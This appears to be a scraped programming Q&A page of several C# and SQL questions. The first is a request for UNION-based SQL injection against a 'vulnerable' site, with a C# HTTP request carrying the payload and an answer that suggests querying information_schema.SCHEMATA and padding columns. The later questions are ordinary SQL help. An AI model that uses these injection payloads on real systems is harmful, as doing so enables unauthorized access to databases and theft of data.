If I had a vulnerable site how would I go by getting the Database names, table names, column names and amount of rows in the columns using UNION or ERROR queries, in C#?
The code I have right now is:
(xNet)
HttpRequest httpRequest = new HttpRequest()
//DB NAMES
string result = httpRequest.Get("https://vulnerable.url/example?id=23" + " UNION ALL SELECT 1, group_concat(.:, database, .:),3,4,5,6 -- ")
//2 is the vulnerable column
if(result.Contains(".:")
{
string output = Regex.Match(result, ".: (.*?) .:")
}
Console.Writeline(output);
That's what I'm trying to use to get the database names, I know that to get the version, i would replace "database()" with "version()" (I think)
but the output is just "database()",
I also want to get the column names and amount of rows in the database.
Thanks
Using the information_schema SCHEMATA contains databases but there are other there for Tables and COLUMNS.
So:
UNION SELECT CATALOG_NAME,SCHEMA_NAME FROM information_schema.SCHEMATA
The tricky bit is matching the number of columns in this UNION with what the original query is returning. Like your example you can padd fields with dummy values or CONCAT(f1, ' ', f2) if you have more fields than the original query.
The other part about SQL is knowing where you are injecting so you can adjust the string to make it valid SQL.
Related
I have two access databases, (ProdDB.mdb) and (AllProdOrders.mdb).
In ProdDB.mdb, I have two tables that have the same structure: Data and Archive
In AllProdOrders.mdb, I have one table: Outputs
This is what I want to do:
What I want to do is create an SQL query that will combine the two tables, Data and Archive into one table and remove any duplicates by checking against three columns: Prod Ord, SO nr and Item No. If these three values are the same for any entry, that is a duplicate and thus shouldn't be included.
After this, I want to left join the AllProdOrders.mdb table: Outputs and add a column to the end of my table. This is done by checking the Order Status in that table against the SO nr.
I have already done the left join portion and my query works properly, all I really need to add is combining the two tables and filtering out any duplicates:
This is my code so far...
string sql = "SELECT [Data].[SO nr], [Data].[Value (GBP)], [Data].[Ship Date (Cust)], [Data].[Line] " +
#"FROM [Archive]" +
"UNION " +
#"SELECT [Data].[SO nr], [Data].[Value(GBP)], [Data].[Ship Date(Cust)], [Data].[Line], status.[Order Status] " +
#"FROM [Data] LEFT JOIN [;database=I:\Departments\Production\AllProdOrders.mdb].[Outputs] AS status " +
"ON [Data].[Prod Ord] = status.[No] "
I'm going to use this combination of tables in my query with an OleDBDataReader to get the total (Value (GBP) of certain orders.
I'm getting a number of columns doesn't match error but I'm not sure how to rectify this as the extra column is the Order Status column that is added to the end of the query and comes from the second database.
As you say, you have an extra column in the second part of the union query. The columns must always match in a union-query. If you add ", NULL as [Order Status]" in the end of the first line I believe the error goes away.
When my query is:
select * from table_name where name='jim'
everything is fine.
But when my query is:
select * from table where ='a statement with 2 and more word'
For example this query:
select columns from table where ='jim carrey'
The query just considers 'jim'. In other words, the query just considers the first word and does not consider whatever comes after that.
SQL does not work like that. If you take the following three queries:
select * from users where name = 'Frank Jones'
select * from users where name = 'Frank'
select * from users where name like 'Frank%'
If I run these on my SQL server database (after changing back to our real data structure) I will get 1 response to the first , the person who is actually named "Frank Jones'. I will not get 'Frank Jones III'
Since both first and last names are in the name columns if I run the second query, I will get no results.
If I run the third query I will get everyone whose first name if Frank but will not get "Jason Franks' because I only have a wildcard at the end of the phrase I am searching for. If I wanted everyone who had and portion of Frank in their name I would write this query:
select * from users where name like '%Frank%'
These are standard rules on what the various where clauses mean that apply to every database I have ever seen (although some might have a differnt wildcard symbol).
You don't say what platform you are using which makes answering your question harder but I will give an answer that will be close.
You need to parse the first work in the string. So
SELECT aColumn
FROM aTable
WHERE name = LEFT('Jim Carrey', CHARINDEX('Jim Carrey',' '))
Would be an example in sql server
The name of these functions changes for each platform.
This is my table:
I am basically using the following table to pass a select statement and viewing it as a pie graph.The pie graph excludes fields that are null or 0. So First i used the following query to select the total number by its respective group number and it worked fine. This is the working query.
query = "Select groupNumber as \"Group Number\", totalNumber as \"Total Number\" From " + table;
However i found it hard to read since both columns are numbers and therefore figured it will be better to pass a query where i can select the total numbers by its respective groupName. This is a problem though because if u look at the table you will notice that groupNames can be repeated.
Therefore i would like to do a select satement where i can query the total number by the groupnumber and groupname.
Is this possible if so how? Also i can't modify the data as i receive it in such format from a established connection.
I have following query
select * from table1
if table1 contains text type column/columns then I need only 100 characters
Assume, End User don't know the schema(columns name) of table,Just know table name
Executing this query from query analyzer that is front end application.
User writer query in textarea and executes
*I am Using SqlServer2005
Dont use substring function in query from frond end
I can use substring function on text columns in C# code but I want this in database end.
*
If I understand correctly, you want the user to specify a table name, and get in return the result of SELECT * FROM with all the text fields limited to 100 characters, and all that on the database side?
Seems to me you need to create a stored procedure to do that. Your input parameter would be the table name, then you'll go on querying the table's structure, and build a dynamic SELECT statement that uses the SQL substring on text fields larger than 100 characters. Run the dynamic SQL statement inside your stored procedure, and that will be your result.
To get the table structure, just run the stored procedure sp_help with the table name as a parameter. The result will contain the column names and types. Loop over it to build your dynamic SQL statement.
I would recommend doing this in application logic rather than in SQL, especially since it seems that you are talking about more than one table.
Use The SqlDataReader, loop through the results and cut the strings as you need them:
while(reader.Read())
{
var rawValues = reader.GetValues();
var values = new object[rawValues.Length];
for (i=0; i < rawValues.Length; i++)
{
var value = rawValues[i];
if(value != null && value is string && value.Length > 100]
values[i] = value.SubString(0, 100);
}
//now do whatever you want with the values
}
To avoid constant reflection (is string) you could also use the schema info of the reader to figure out which are string columns.
I am creating C# winforms application, which connects to the Database.
Because I have a many records in database, I want to filter data on sql side (Filter must have many options without start/end date).
What is a best way to achive this?
I know I can use BindingSource for filtering, but I think It is not recomended, because in this case I must select all data from database.
p.s. Sorry for my poor English.
You should always prefer filtering data on database instead of bringing unwanted data to your application and filtering with code.
Eg
string query = "SELECT * FROM MyTable ";
In the string below you add a WHERE clause and pairs of column = value or column = expression
string query = "SELECT * FROM MyTable WHERE column1=somevalue AND column2 > somevalue AND ...";